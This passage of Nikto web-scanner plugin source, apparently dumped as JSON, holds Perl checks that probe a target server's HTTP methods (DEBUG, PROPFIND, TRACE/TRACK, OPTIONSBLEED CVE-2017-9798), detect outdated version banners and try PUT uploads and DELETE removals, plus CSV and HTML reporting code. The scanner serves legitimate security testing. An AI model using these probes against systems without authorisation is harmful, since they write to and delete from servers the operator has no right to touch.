|| $o eq '');\n    }\n\n    $allow_methods =~ s/^[ ]?, //;\n    foreach my $o (split(/,[ ]?/, $poptions)) {\n        $public_methods .= \", $o\" unless ($public_methods =~ /\\b$o\\b/ || $o eq '');\n    }\n    $public_methods =~ s/^[ ]?, //;\n\n    # proxy can impose its methods... should actually check this not just warn\n    if ($CLI{'useproxy'} ne \"\") { $txt = \"(May be proxy's methods, not server's)\"; }\n\n    %davmethods = ();\n    if ($allow_methods ne \"\") {\n        add_vulnerability($mark, \"OPTIONS: Allowed HTTP Methods: $allow_methods $txt\",\n                          999990, \"\", \"OPTIONS\", \"/\", $request, $response);\n        foreach my $m (split /,? /, $allow_methods) {\n            my $method = eval_methods($m, \"Allow\", $dbarray, $mark);\n            if ($method ne \"\") { $davmethods{$method} = 1 }\n        }\n    }\n\n    if ($public_methods ne \"\") {\n        add_vulnerability($mark, \"OPTIONS: Public HTTP Methods: $public_methods $txt\",\n                          999985, \"\", \"OPTIONS\", \"/\", $request, $response);\n        foreach my $m (split /,? /, $public_methods) {\n            my $method = eval_methods($m, \"Public\", $dbarray, $mark);\n            if ($method ne \"\") { $davmethods{$method} = 1 }\n        }\n    }\n\n    if (scalar(keys(%davmethods)) > 0) {\n        $message = \"OPTIONS: WebDAV enabled (\";\n        for my $key (keys %davmethods) {\n            $message .= \"$key \";\n        }\n        $message .= \"listed as allowed)\";\n        add_vulnerability($mark, $message, 999977, \"\", \"OPTIONS\", \"/\", $request, $response);\n    }\n\n    # Check to see what the web server does on out of standard headers\n    my $junkmethod = LW2::utils_randstr(8, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ');\n    ($res, $content, $error, $request, $response) =\n      nfetch($mark, \"/\", $junkmethod, \"\", \"\", \"\", \"httpoptions: Junk HTTP method\");\n    if ($res == 200) {\n        add_vulnerability(\n            $mark,\n            \"/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\",\n            999967,\n            \"\",\n            $junkmethod,\n            '/',\n            $request,\n            $response\n            );\n        $junkmethodresp = LW2::md5($content);\n    }\n\n    # Check for other weirdness\n    # IIS Debug\n    return if $mark->{'terminate'};\n    ($res, $content, $error, $request, $response) =\n      nfetch($mark, \"/\", \"DEBUG\", \"\", \"\", \"\", \"httpoptions: DEBUG\");\n    if ($res == 200 && (LW2::md5($content) ne $junkmethodresp)) {\n        add_vulnerability(\n            $mark,\n            \"/: DEBUG HTTP verb may show server debugging information.\",\n            999972,\n            \"https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017\",\n            \"DEBUG\",\n            '/',\n            $request,\n            $response\n            );\n    }\n\n    # IIS PROPFIND HEADER\n    return if $mark->{'terminate'};\n    my %headers = (\"Host\"           => \"\",\n                   \"Content-Length\" => \"0\",);\n    ($res, $content, $error, $request, $response) =\n      nfetch($mark, \"/\", \"PROPFIND\", \"\", \\%headers, { noclean => 1 }, \"httpoptions: PROPFIND\");\n    if ($res == 207) {\n        if ($content =~ \"<a:href>https?://\") {\n            my $ipfound = $content;\n            $ipfound =~ s/^.*<a:href>//g;\n            $ipfound =~ s/<\\/a:href>.*$//g;\n            add_vulnerability(\n                $mark,\n                \"/: PROPFIND HTTP verb may show the server's internal IP address: $ipfound\",\n                999973,\n                \"https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2003/aa142960(v%3Dexchg.65)\",\n                \"PROPFIND\",\n                \"/\",\n                $request,\n                $response\n                );\n        }\n    }\n\n    # Special checks for TRACE/TRACK to see whether its vulnerable\n    %headers = (\"Trace-Test\" => \"Nikto\");\n    foreach my $method (split(/ /, \"TRACE TRACK\")) {\n\n        # Check for all flavours of HTTP\n        foreach my $version (split(/ /, \"0.9 1.0 1.1\")) {\n            return if $mark->{'terminate'};\n            ($res, $content, $error, $request, $response) =\n              nfetch($mark, \"/\", $method, \"\", \\%headers, {}, \"httpoptions: $method\", $version);\n            if ($res == 200) {\n                if ($content =~ /Trace-Test: Nikto/) {\n                    add_vulnerability(\n                        $mark,\n                        \"/: HTTP $method method is active and replies which suggests the host is vulnerable to XST\",\n                        \"000434\",\n                        \"https://owasp.org/www-community/attacks/Cross_Site_Tracing\",\n                        $method,\n                        \"/\",\n                        $request,\n                        $response,\n                        \"Content match\"\n                        );\n\n                    # now we know its vulnerable stop testing\n                    last;\n                }\n            }\n        }\n    }\n\n    # Now release memory for the dbarray\n    undef @$dbarray;\n    return;\n}\n\nsub eval_methods {\n    my $method  = $_[0] || return;\n    my $type    = $_[1];\n    my $dbarray = $_[2];\n    my $mark    = $_[3];\n    my $message;\n    $method = uc($method);\n\n    # Now search database for the method.\n    foreach my $item (@$dbarray) {\n        if (   $method eq \"PROPPATCH\"\n            || $method eq \"SEARCH\"\n            || $method eq \"PROPFIND\"\n            || $method eq \"COPY\"\n            || $method eq \"LOCK\"\n            || $method eq \"UNLOCK\") {\n            return $method;\n        }\n\n        if ($item->{'method'} eq $method) {\n            if ($item->{'nikto_id'} eq \"0\") {\n\n                # is webdav\n                return $method;\n            }\n            else {\n                $message = $item->{'message'};\n                $message =~ s/\\@TYPE\\@/$type/;\n                add_vulnerability($mark, $message, $item->{'nikto_id'}, $item->{'refs'});\n            }\n        }\n    }\n\n    return \"\";\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_optionsbleed.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Scan for OPTIONSBLEED (CVE-2017-9798)\n###############################################################################\n\nsub nikto_optionsbleed_init {\n    my $id = { name        => \"optionsbleed\",\n               full_name   => \"OPTIONSBLEED (CVE-2017-9798) check\",\n               author      => \"Sullo\",\n               description => \"Detects OPTIONSBLEED vulnerability (CVE-2017-9798)\",\n               hooks       => { scan => { method => \\&nikto_optionsbleed, } },\n               copyright   => \"2025 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_optionsbleed {\n    my ($mark)       = @_;\n    my $num_requests = 50;                       # Number of OPTIONS requests to send\n    my $path         = $mark->{'root'} || '/';\n\n    for (my $i = 0 ; $i < $num_requests ; $i++) {\n        my ($res, $content, $error, $request, $response) =\n          nfetch($mark, $path, 'OPTIONS', '', '', undef, 'optionsbleed');\n        my $allow = $response->{'allow'};\n        if (!defined $allow) {\n\n            # No Allow header exit early\n            last;\n        }\n\n        # Should only be uppercase letters and commas, no spaces\n        if ($allow =~ /[^A-Z, ]/ || $allow =~ /,,+/) {\n            add_vulnerability($mark,\n                       \"$path: Potential OPTIONSBLEED vulnerability detected. Allow header: $allow\",\n                       740002, \"CVE-2017-9798\", 'OPTIONS', $path, $request, $response,\n                       \"Allow header value contains [^A-Z, ] or ,,\");\n            return;\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_outdated.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Check for outdated items in banner\n###############################################################################\nsub nikto_outdated_init {\n    my $id = { name        => \"outdated\",\n               full_name   => \"Outdated\",\n               author      => \"Sullo\",\n               description => \"Checks to see whether the web server is the latest version.\",\n               copyright   => \"2008 Chris Sullo\",\n               hooks       => { scan => { method => \\&nikto_outdated, }, },\n               };\n    return $id;\n}\n\nsub nikto_outdated {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n\n    # Process banner to populate @BUILDITEMS for later eval\n\n    # If banner has nothing that can be a version... return\n    if ($mark->{'banner'} !~ /(?:\\d|\\/|\\.)/) { return; }\n\n    # If Apache, split on space...\n    elsif (   ($mark->{'banner'} =~ /apache/i)\n           || (($mark->{'banner'} =~ /\\s/) && ($mark->{'banner'} =~ /\\//))) {\n        foreach my $item (split(/ /, $mark->{'banner'})) {\n            $mark->{'components'}->{$item} = 1;\n        }\n    }\n\n    # Some specific (and common) banner processing\n    # WebLogic: strip all the date info...\n    elsif ($mark->{'banner'} =~ /weblogic/i) {\n        my @T = split(/ /, $mark->{'banner'});\n        $mark->{'components'}->{ $T[0] . '\\/' . $T[1] } = 1;\n    }\n\n    # SiteScope: strip all the date info...\n    elsif ($mark->{'banner'} =~ /sitescope/i) {\n        my @T = split(/ /, $mark->{'banner'});\n        $mark->{'components'}->{ $T[0] } = 1;\n    }\n\n    # Jetty: strip the ( ) away:\n    elsif ($mark->{'banner'} =~ /jetty\\(/i) {\n        $mark->{'banner'} =~ /Jetty\\(([0-9a-zA-Z.\\-]+)\\)/i;\n        $mark->{'components'}->{ 'Jetty/' . $1 } = 1;\n    }\n\n    # Some, like WEBrick, have multiple items but no spaces\n    elsif (   ($mark->{'banner'} !~ /\\s/)\n           && ($mark->{'banner'} =~ /\\/.*\\//)\n           && ($mark->{'banner'} =~ /\\(/)) {\n\n        # try converting () t spaces\n        foreach my $item (split(/[\\(\\)]/, $mark->{'banner'})) {\n            $mark->{'components'}->{$item} = 1;\n        }\n    }\n\n    # Finally, unknown banners\n    else {\n\n        # use the last non 0-9 . a-z char as a sepr (' ', '-', '_' etc)\n        my $sepr = $mark->{'banner'};\n        $sepr =~ s/[a-zA-Z0-9\\.\\(\\)]//gi;\n        if ($sepr eq '') {\n            $MATCHSTRING = $mark->{'banner'};\n        }\n        else {\n            $sepr = substr($sepr, (length($sepr) - 1), 1);\n\n            # break up ID string on $sepr\n            my @T = split(/\\\\$sepr/, $mark->{'banner'});\n\n            # assume last is version...\n            for ($i = 0 ; $i < $#T ; $i++) { $MATCHSTRING .= \"$T[$i] \"; }\n        }\n        $MATCHSTRING =~ s/\\s+$//;\n        $mark->{'components'}->{$MATCHSTRING} = 1;\n        nprint(\"Server Version String:$MATCHSTRING\", \"d\");\n    }\n\n    my ($v, $V, $BI, $k) = \"\";\n\n    # For each running component\n    foreach $BI (keys %{ $mark->{'components'} }) {\n        my $have_match = 0;\n\n        # Check it against each value from db_outdated\n        foreach $V (sort keys %OVERS) {\n            next if $V eq '';\n            if ($BI =~ /^$V/i)    # software name matched\n            {\n                $have_match = 1;\n\n                # nab version\n                foreach $k (keys %{ $OVERS{$V} }) {\n                    if ($k eq \"\")    { next; }\n                    if ($k eq \"tid\") { next; }\n                    $v = $k;\n                }\n\n                # do version check (return true if we should alert)\n                if (vereval($v, $BI, $V, $mark)) {\n                    my $msg = $OVERS{$V}{$v};\n                    $msg =~ s/\\@RUNNING_VER/$BI/g;\n                    $msg =~ s/\\@CURRENT_VER/$v/g;\n                    chomp($msg);\n                    add_vulnerability($mark,  $msg, $OVERS{$V}{'tid'}, \"\",\n                                      \"HEAD\", \"/\",  \"\",                \"\",\n                                      \"Content match\"\n                                      );\n                }\n            }\n        }\n        if (!$have_match) { $mark->{'components'}->{$BI} = 2; }\n    }\n    return;\n}\n\n# do version evaluation\n# arguments:\n#\t0: latest version as defined in db_outdated\n#\t1: running item being evaluated\n#\t2: item being matched against in db_outdated\n#\t3: mark hash\nsub vereval {\n\n    # split both by last char of $_[2], as it is the name to version separator\n    my $sepr = substr($_[2], (length($_[2]) - 1), 1);\n    nprint(\"nikto_outdated.plugin: verstring: $_[2], sepr:$sepr\",\n           \"d\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n\n    my $CURRENT      = lc($_[0]);\n    my $RUNNING      = lc($_[1]);\n    my $CURRENT_ORIG = $CURRENT;\n    my $RUNNING_ORIG = $RUNNING;\n    my $mark         = $_[3];\n\n    nprint(\"nikto_outdated.plugin: \\$CURRENT:$CURRENT:\\$RUNNING:$RUNNING:\",\n           \"d\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n\n    my @T = split(/\\Q$sepr\\E/, $CURRENT);\n    $CURRENT = $T[$#T];                    # should be version...\n    @T       = split(/\\Q$sepr\\E/, $RUNNING);\n    $RUNNING = $T[$#T];                    # should be version...\n\n    # convert alphas to numerics so we can do a real comparison\n    $CURRENT =~ s/([^0-9\\.]){1}/\".\" . ord($1) . \".\"/eg;\n    $RUNNING =~ s/([^0-9\\.]){1}/\".\" . ord($1) . \".\"/eg;\n    $RUNNING =~ s/\\.+/\\./g;\n    $CURRENT =~ s/\\.+/\\./g;\n    $RUNNING =~ s/^\\.//;\n    $CURRENT =~ s/^\\.//;\n    $RUNNING =~ s/\\.$//;\n    $CURRENT =~ s/\\.$//;\n\n    nprint(\"nikto_outdated.plugin: \\$CURRENT:$CURRENT:\\$RUNNING:$RUNNING\\: (after numberifcation)\",\n           \"d\", $mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'});\n\n    if (($CURRENT !~ /[a-z]/) && ($RUNNING !~ /[a-z]/)) {\n        @CUR = split(/\\./, $CURRENT);\n        @RUN = split(/\\./, $RUNNING);\n    }\n    else {\n        @CUR = split(//, $CURRENT);\n        @RUN = split(//, $RUNNING);\n    }\n\n    # start with 0... eval each in turn...\n    for (my $i = 0 ; $i <= $#CUR ; $i++) {\n        nprint(\"nikto_outdated.plugin: major compare: \\$CUR[$i]:$CUR[$i]: \\$RUN[$i]:$RUN[$i]:\",\n               \"d\", $mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'});\n        if ($CUR[$i] > $RUN[$i])                  { return 1; }    # running is older\n        if (($CUR[$i] ne \"\") && ($RUN[$i] eq \"\")) { return 1; }    # running is older\n        if ($CUR[$i] < $RUN[$i])                                   # running is newer\n        {\n            my $string = $_[1];\n            $string =~ s/\\s/\\%20/g;\n            $mark->{'components'}->{$string} = 2;\n            return 0;\n        }\n    }\n    return 0;    # running is the same version if we make it here\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_paths.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Look at paths to help populate variables\n###############################################################################\nsub nikto_paths_init {\n    my $id = { name        => \"paths\",\n               full_name   => \"Path Search\",\n               author      => \"Sullo\",\n               description => \"Look at link paths to help populate variables\",\n               hooks       => {\n                          recon => { method => \\&nikto_paths,\n                                     weight => 20,\n                                     },\n                            },\n               copyright => \"2012 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_paths {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n    my (%DIRS, %FILES);\n\n    # Follow redirects by temporarily by setting $CLI{'followredirects'} to 1\n    # Request the root path to follow redirects if needed\n    my $followredirects = $CLI{'followredirects'};\n    $CLI{'followredirects'} = 1;\n    my ($res, $content) = nfetch($mark, \"/\", \"GET\", \"\", \"\", \"\", \"Paths\");\n    $CLI{'followredirects'} = $followredirects;\n\n    if (length($content)) {\n\n        # get links\n        my @links = LW2::html_link_extractor($content);\n        my %FULL_LINKS;\n        my %valid_hosts =\n          map { $_ => 1 } ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'vhost'}, $mark->{'ident'});\n        foreach my $link (@links) {\n\n            # if not relative\n            if ($link !~ /^\\//) {\n\n                # check host\n                my @uri = LW2::uri_split($link);\n                if (exists $valid_hosts{ $uri[2] }) {\n                    $link = $uri[0];\n                }\n                else {\n                    next;\n                }\n            }\n\n            # normalize\n            $link = LW2::uri_normalize($link);\n            $FULL_LINKS{$link} = 1;\n\n            # split dirs / files\n            my $dir = LW2::uri_get_dir($link);\n            $dir = validate_and_fix_regex($dir);\n            my $file = $link;\n            $file =~ s/^$dir//;\n\n            if ($file ne '') {\n                $file =~ s/\\\\//g;\n                $FILES{$file} = 1;\n            }\n\n            if (($dir ne '') && ($dir ne '/')) {\n                $dir =~ s/\\\\//g;\n                $DIRS{$dir} = 1;\n            }\n        }\n\n        # Use shared path matching logic\n        path_matcher(\\%FILES, \\%DIRS, \\%FULL_LINKS);\n\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_put_del_test.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Try put and then delete a file\n###############################################################################\nsub nikto_put_del_test_init {\n    my $id = { name        => \"put_del_test\",\n               full_name   => \"Put/Delete test\",\n               author      => \"Sullo\",\n               description =>\n                 \"Attempts to upload and delete files through the PUT and DELETE HTTP methods.\",\n               hooks     => { scan => { method => \\&nikto_put_del_test, }, },\n               copyright => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_put_del_test {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n    my $msg;\n\n    # PUT a page\n    my $uri = \"/nikto-test-\" . LW2::utils_randstr(8) . \".html\";\n    my ($res, $content, $error, $request, $response) =\n      nfetch($mark, $uri, \"PUT\", \"This was a Nikto test.\", \"\", \"\", \"put_del_test: PUT\");\n\n    # Request it back\n    if ($res eq 201) {\n        ($res, $content, $error, $request, $response) =\n          nfetch($mark, $uri, \"GET\", \"\", \"\", \"\", \"put_del_test: GET\");\n        if ($content =~ /This was a Nikto test/) {\n            add_vulnerability(\n                          $mark,\n                          \"$uri: HTTP method 'PUT' allows clients to save files on the web server.\",\n                          999995,\n                          \"https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled\",\n                          \"PUT\",\n                          $uri,\n                          $request,\n                          $response\n                          );\n\n            # we were able to put it there--can we delete it?\n            ($res, $content, $error, $request, $response) =\n              nfetch($mark, $uri, \"DELETE\", \"\", \"\", \"\", \"put_del_test: DELETE\");\n            if ($res eq 200) {\n                ($res, $content, $error, $request, $response) =\n                  nfetch($mark, $uri, \"GET\", \"\", \"\", \"\", \"put_del_test: GET\");\n                if ($content !~ /This was a Nikto test/)    # gone now\n                {\n                    add_vulnerability(\n                        $mark,\n                        \"$uri: HTTP method 'DELETE' allows clients to delete files on the web server.\",\n                        999994,\n                        \"https://cwe.mitre.org/data/definitions/650.html\",\n                        \"DELETE\",\n                        $uri,\n                        $request,\n                        $response\n                        );\n                }\n            }\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_report_csv.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: CSV Reporting\n###############################################################################\nsub nikto_report_csv_init {\n    my $id = { name              => \"report_csv\",\n               full_name         => \"CSV reports\",\n               author            => \"Tautology\",\n               description       => \"Produces a CSV report.\",\n               report_head       => \\&csv_open,\n               report_host_start => \\&csv_host_start,\n               report_item       => \\&csv_item,\n               report_ssl_info   => \\&csv_ssl_info,\n               report_format     => 'csv',\n               copyright         => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\n###############################################################################\n# open output file\nsub csv_open {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Open file with lexical handle and produce header\n    my $fh;\n    open($fh, \">>\", $file) || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Enable autoflush\n    $fh->autoflush(1);\n\n    # Write header\n    print $fh \"\\\"$VARIABLES{'name'} - v$VARIABLES{'version'}/$VARIABLES{'core_version'}\\\"\\n\";\n    return $fh;\n}\n\n###############################################################################\n# start output\nsub csv_host_start {\n    my ($handle, $mark) = @_;\n    $mark->{'banner'} =~ s/\"/\\\\\"/g;\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n    print $handle \"\\\"\"\n      . csv_safecell($hostname) . \"\\\",\" . \"\\\"\"\n      . csv_safecell($mark->{'ip'}) . \"\\\",\" . \"\\\"\"\n      . csv_safecell($mark->{'port'}) . \"\\\",\" . \"\\\"\\\",\" . \"\\\"\\\",\" . \"\\\"\\\",\" . \"\\\"\"\n      . csv_safecell($mark->{'banner'}) . \"\\\"\\n\";\n    return;\n}\n\n###############################################################################\n# write SSL info\nsub csv_ssl_info {\n    my ($handle, $mark) = @_;\n    my $ssl_hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n\n    # SSL Subject\n    print $handle \"\\\"\"\n      . csv_safecell($ssl_hostname) . \"\\\",\" . \"\\\"\"\n      . csv_safecell($mark->{'ip'}) . \"\\\",\" . \"\\\"\"\n      . csv_safecell($mark->{'port'}) . \"\\\",\"\n      . \"\\\"000137\\\",\"\n      . \"\\\"GET\\\",\"\n      . \"\\\"/\\\",\" . \"\\\"\"\n      . csv_safecell(\"SSL Certificate Subject: \" . ($mark->{'ssl_cert_subject'} || '')) . \"\\\"\\n\";\n\n    # SSL CN if present\n    if ($mark->{'ssl_cert_subject'} =~ /CN=([^$ \\/]+)/) {\n        my $cn = $1;\n        print $handle \"\\\"\"\n          . csv_safecell($ssl_hostname) . \"\\\",\" . \"\\\"\"\n          . csv_safecell($mark->{'ip'}) . \"\\\",\" . \"\\\"\"\n          . csv_safecell($mark->{'port'}) . \"\\\",\"\n          . \"\\\"000137\\\",\"\n          . \"\\\"GET\\\",\"\n          . \"\\\"/\\\",\" . \"\\\"\"\n          . csv_safecell(\"SSL Certificate CN: $cn\") . \"\\\"\\n\";\n    }\n\n    # SSL SAN if present\n    if ($mark->{'ssl_cert_altnames'} ne '') {\n        print $handle \"\\\"\"\n          . csv_safecell($ssl_hostname) . \"\\\",\" . \"\\\"\"\n          . csv_safecell($mark->{'ip'}) . \"\\\",\" . \"\\\"\"\n          . csv_safecell($mark->{'port'}) . \"\\\",\"\n          . \"\\\"000137\\\",\"\n          . \"\\\"GET\\\",\"\n          . \"\\\"/\\\",\" . \"\\\"\"\n          . csv_safecell(\"SSL Certificate SAN: \" . $mark->{'ssl_cert_altnames'}) . \"\\\"\\n\";\n    }\n\n    # SSL Ciphers\n    print $handle \"\\\"\"\n      . csv_safecell($ssl_hostname) . \"\\\",\" . \"\\\"\"\n      . csv_safecell($mark->{'ip'}) . \"\\\",\" . \"\\\"\"\n      . csv_safecell($mark->{'port'}) . \"\\\",\"\n      . \"\\\"000137\\\",\"\n      . \"\\\"GET\\\",\"\n      . \"\\\"/\\\",\" . \"\\\"\"\n      . csv_safecell(\"SSL Ciphers: \" . ($mark->{'ssl_cipher'} || '')) . \"\\\"\\n\";\n\n    # SSL Issuer\n    print $handle \"\\\"\"\n      . csv_safecell($ssl_hostname) . \"\\\",\" . \"\\\"\"\n      . csv_safecell($mark->{'ip'}) . \"\\\",\" . \"\\\"\"\n      . csv_safecell($mark->{'port'}) . \"\\\",\"\n      . \"\\\"000137\\\",\"\n      . \"\\\"GET\\\",\"\n      . \"\\\"/\\\",\" . \"\\\"\"\n      . csv_safecell(\"SSL Certificate Issuer: \" . ($mark->{'ssl_cert_issuer'} || '')) . \"\\\"\\n\";\n}\n\n###############################################################################\n# print an item\nsub csv_item {\n    my ($handle, $mark, $item) = @_;\n    foreach my $uri (split(' ', $item->{'uri'})) {\n        my $line = '';\n        my $hostname =\n          $item->{'mark'}->{'vhost'} ? $item->{'mark'}->{'vhost'} : $item->{'mark'}->{'hostname'};\n        $line .= \"\\\"\" . csv_safecell($hostname) . \"\\\",\";\n        $line .= \"\\\"\" . csv_safecell($item->{'mark'}->{'ip'}) . \"\\\",\";\n        $line .= \"\\\"\" . csv_safecell($item->{'mark'}->{'port'}) . \"\\\",\";\n\n        $line .= \"\\\"\";\n        if ($item->{'refs'} ne '') { $line .= $item->{'refs'}; }\n        $line .= \"\\\",\";\n\n        $line .= \"\\\"\";\n        if ($item->{'method'} ne '') { $line .= $item->{'method'}; }\n        $line .= \"\\\",\";\n\n        $line .= \"\\\"\";\n        if (($uri ne '') && ($mark->{'root'} ne '') && ($uri !~ /^$mark->{'root'}/)) {\n            $line .= csv_safecell($mark->{'root'}) . $uri;\n        }\n        else { $line .= csv_safecell($uri); }\n        $line .= \"\\\",\";\n\n        my $msg = $item->{'message'};\n        $uri = quotemeta($uri);\n        my $root = quotemeta($mark->{'root'});\n        $msg =~ s/^$uri:\\s//;\n        $msg =~ s/^$root$uri:\\s//;\n        $msg =~ s/\"/\\\\\"/g;\n        $line .= \"\\\"\" . csv_safecell($msg) . \"\\\"\";\n        print $handle \"$line\\n\";\n    }\n}\n\n###############################################################################\n# prevent CSV injection attacks\nsub csv_safecell {\n    my $celldata = $_[0] || return;\n    if ($celldata =~ /^[=+@-]/) { $celldata = \"'\" . $celldata; }\n    return $celldata;\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_report_html.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: HTML Reporting\n###############################################################################\nsub nikto_report_html_init {\n    my $id = { name              => \"report_html\",\n               full_name         => \"Report as HTML\",\n               author            => \"Sullo/Jabra\",\n               description       => \"Produces an HTML report.\",\n               report_head       => \\&html_head,\n               report_summary    => \\&html_summary,\n               report_host_start => \\&html_host_start,\n               report_host_end   => \\&html_host_end,\n               report_item       => \\&html_item,\n               report_close      => \\&html_close,\n               report_ssl_info   => \\&html_ssl_info,\n               report_format     => 'htm',\n               copyright         => \"2008 Chris Sullo\"\n               };\n\n    # load up the templates now\n    html_open_templates();\n    return $id;\n}\n###############################################################################\nsub html_head {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Write header for html file, return file handle\n    my $fh;\n    open($fh, \">>\", $file) || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Enable autoflush\n    $fh->autoflush(1);\n\n    my $html = process_template($TEMPLATES{'htm_start'}, $mark);\n    $html =~ s/\\#NIKTODTD#/$CONFIGFILE{'NIKTODTD'}/;\n    print $fh \"$html\";\n\n    return $fh;\n}\n###############################################################################\nsub html_close {\n    my ($handle, $mark) = @_;\n    my $html = process_template($TEMPLATES{'htm_close'}, $mark);\n    print $handle \"$html\\n\";\n\n    close($handle);\n    return;\n}\n###############################################################################\nsub html_summary {\n    my ($handle, $mark) = @_;\n    my $html = process_template($TEMPLATES{'htm_summary'}, $mark);\n    print $handle $html;\n\n    return;\n}\n###############################################################################\n# Store host header HTML until SSL info is available\nour $HTML_HOST_HEADER = undef;\nour $HTML_HOST_HANDLE = undef;\nour $HTML_HOST_MARK   = undef;\n\nsub html_host_start {\n    my ($handle, $mark) = @_;\n\n    # Store handle and mark for later use when SSL info is available\n    $HTML_HOST_HANDLE = $handle;\n    $HTML_HOST_MARK   = $mark;\n\n    # Don't write yet - wait for SSL info to be available\n    # The template will be written by html_ssl_info() or html_host_end()\n\n    return;\n}\n###############################################################################\nsub html_ssl_info {\n    my ($handle, $mark) = @_;\n\n    # If host header hasn't been written yet, write it now with SSL info\n    if (defined $HTML_HOST_HANDLE) {\n        my $html = process_template($TEMPLATES{'htm_host_head'}, $mark);\n        print $handle \"$html\\n\";\n\n        # Clear stored values\n        $HTML_HOST_HEADER = undef;\n        $HTML_HOST_HANDLE = undef;\n        $HTML_HOST_MARK   = undef;\n    }\n\n    # If header was already written by html_item, we can't update it\n    # This is acceptable - SSL info will be missing but header is in correct position\n\n    return;\n}\n###############################################################################\nsub html_host_end {\n    my ($handle, $mark) = @_;\n\n    # If host header wasn't written yet (no SSL), write it now without SSL info\n    if (defined $HTML_HOST_HANDLE) {\n        my $html = process_template($TEMPLATES{'htm_host_head'}, $HTML_HOST_MARK);\n        print $HTML_HOST_HANDLE \"$html\\n\";\n\n        # Clear stored values\n        $HTML_HOST_HEADER = undef;\n        $HTML_HOST_HANDLE = undef;\n        $HTML_HOST_MARK   = undef;\n    }\n\n    my $html = process_template($TEMPLATES{'htm_end'}, $mark);\n    print $handle \"$html\\n\";\n\n    return;\n}\n###############################################################################\nsub html_item {\n    my ($handle, $mark, $item) = @_;\n\n    # If host header hasn't been written yet, write it now (without SSL info)\n    # This ensures the header appears before any items\n    if (defined $HTML_HOST_HANDLE) {\n\n        # Use the stored mark which has the initial host info\n        my $html = process_template($TEMPLATES{'htm_host_head'}, $HTML_HOST_MARK);\n        print $handle \"$html\\n\";\n\n        # Clear stored values\n        $HTML_HOST_HEADER = undef;\n        $HTML_HOST_HANDLE = undef;\n        $HTML_HOST_MARK   = undef;\n    }\n\n    my $html = process_template($TEMPLATES{'htm_host_item'}, $mark, $item);\n    print $handle \"$html\\n\";\n\n    return;\n}\n###############################################################################\nsub html_open_templates {\n    foreach my $t (dirlist($CONFIGFILE{'TEMPLATEDIR'}, \"htm.*\")) {\n        open(T, \"<$CONFIGFILE{'TEMPLATEDIR'}/$t\");\n        my @TEMPLATE = <T>;\n        close(T);\n        my $T = join(\"\", @TEMPLATE);\n        $t =~ s/\\..*$//;\n        $TEMPLATES{$t} = $T;\n    }\n\n    return;\n}\n###############################################################################\nsub process_template {\n    my ($template, $mark, $item) = @_;\n    my %variables;\n    my $protocol = \"http\";\n    if ($mark->{'ssl'}) { $protocol .= \"s\"; }\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n\n    $variables{\"#TEMPL_HCTR#\"}               = $VARIABLES{'TEMPL_HCTR'};\n    $variables{\"#TEMPL_END#\"}                = date_disp($mark->{'end_time'});\n    $variables{\"#TEMPL_HOSTNAME#\"}           = simple_enc($hostname);\n    $variables{\"#TEMPL_IP#\"}                 = simple_enc($mark->{'ip'});\n    $variables{\"#TEMPL_ITEMS_TESTED#\"}       = $COUNTERS{'total_checks'};\n    $variables{\"#TEMPL_PORT#\"}               = $mark->{'port'};\n    $variables{\"#TEMPL_NIKTO_VER#\"}          = $VARIABLES{'version'};\n    $variables{\"#TEMPL_BANNER#\"}             = simple_enc($mark->{'banner'});\n    $variables{\"#TEMPL_NIKTO_CLI#\"}          = simple_enc($CLI{'all_options'});\n    $variables{\"#TEMPL_CTR#\"}                = $COUNTERS{'total_checks'};\n    $variables{\"#TEMPL_NIKTO_HOSTS_TESTED#\"} = $COUNTERS{'hosts_completed'};\n\n    # Create base URL once - prefer hostname (vhost if set), fall back to IP if hostname empty\n    # Consistent with nikto's display_name logic: prefer name, fall back to IP\n    my $base_host = ($hostname ne \"\") ? $hostname : $mark->{'ip'};\n    my $base_url =\n        $protocol . \"://\"\n      . simple_enc($base_host) . \":\"\n      . $mark->{'port'}\n      . simple_enc($mark->{'root'});\n\n    # 